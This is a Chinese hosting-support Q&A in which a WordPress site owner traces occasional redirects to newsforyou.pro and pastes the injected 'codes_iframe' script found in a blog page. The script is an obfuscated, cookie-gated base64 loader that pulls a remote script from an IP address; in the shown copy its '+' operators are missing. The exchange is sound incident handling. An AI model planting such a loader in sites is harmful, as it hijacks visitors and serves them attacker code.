問:這個(gè)wordpress用的正版主題和插件。
在訪問過程中,偶爾瀏覽時(shí),跳轉(zhuǎn)到newsforyou.pro 這個(gè)網(wǎng)站。
大概過5天,出現(xiàn)過兩次。
我就不知道是否是掛馬,還是有病毒,請(qǐng)排查一下,謝謝。
,懷疑網(wǎng)站中病毒了,請(qǐng)排查一下。
答:您好
我們檢查主機(jī)正常,多次訪問也并未出現(xiàn)跳轉(zhuǎn)的情況,請(qǐng)問是在什么情況下出現(xiàn)跳轉(zhuǎn)的,比如是做什么操作嗎?,非常感謝您長期對(duì)我司的支持.由此給您帶來的不便之處,敬請(qǐng)?jiān)?謝謝!
問:沒在主頁,瀏覽內(nèi)頁時(shí)。
找到從那里跳過去的了,從內(nèi)頁,這里:
http://www.pandawego.com/blog/animal-bonsai/
然后點(diǎn)一張圖片,就跳了。
答:您好,核實(shí)您對(duì)應(yīng)說反饋的情況,其對(duì)應(yīng)跳轉(zhuǎn)到的地址,其是一個(gè)訪問驗(yàn)證檢查,感覺有點(diǎn)像是對(duì)應(yīng)一個(gè)訪問驗(yàn)證攔截,避免網(wǎng)站訪問頻率過高等情況,該問題請(qǐng)核實(shí)一下您對(duì)應(yīng)是否近期有在網(wǎng)站后臺(tái)設(shè)置什么訪問防護(hù)插件等,非常感謝您長期對(duì)我司的支持!
問:找到病毒代碼了:
view-source:http://www.pandawego.com/blog/animal-bonsai/
<!–codes_iframe–><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )" e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\ ^])/g,"\\\\$1") "=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3 86400),date=new Date((new Date).getTime() 86400);document.cookie="redirect=" time "; path=/; expires=" date.toGMTString(),document.write('<script src="' src '"><\\/script>')} </script><!–/codes_iframe–></p>
在這里。
怎么進(jìn)一步處理呢?
答:您好
1、找到代碼后請(qǐng)從相應(yīng)文件中將代碼刪除即可,建議您聯(lián)系程序開發(fā)商為您協(xié)助處理。并讓程序開發(fā)商為您修復(fù)漏洞,若不修復(fù),仍有被入侵的可能。
2、該問題是程序方面問題,若需我司協(xié)助您清理掛馬,請(qǐng)您提交對(duì)應(yīng)工單:【虛擬主機(jī)/數(shù)據(jù)庫問題】—【網(wǎng)站類問題】—【清理網(wǎng)站掛馬代碼和非法信息】,會(huì)涉及到費(fèi)用,另外,我司只能幫您清理掛馬,無法幫您修復(fù)漏洞,請(qǐng)您知悉,非常感謝你的支持!